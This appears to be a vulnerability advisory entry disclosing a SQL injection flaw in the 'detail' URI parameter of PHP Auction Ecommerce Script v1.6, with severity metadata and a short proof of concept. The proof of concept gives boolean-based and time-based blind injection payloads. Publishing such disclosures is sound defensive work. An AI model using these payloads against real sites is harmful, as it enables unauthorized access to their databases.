vendor:
PHP Auction Ecommerce Script
by:
8bitsec
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Auction Ecommerce Script
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: YES
Related CWE: N/A
CPE: a:phpscriptsmall:php_auction_ecommerce_script
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
PHP Auction Ecommerce Script v1.6 – SQL Injection
SQL injection on [detail] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/detail/xx AND 1053=1053/xxxxx Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: AND 1053=1053/xxxx Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: AND SLEEP(5)/xxxx
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.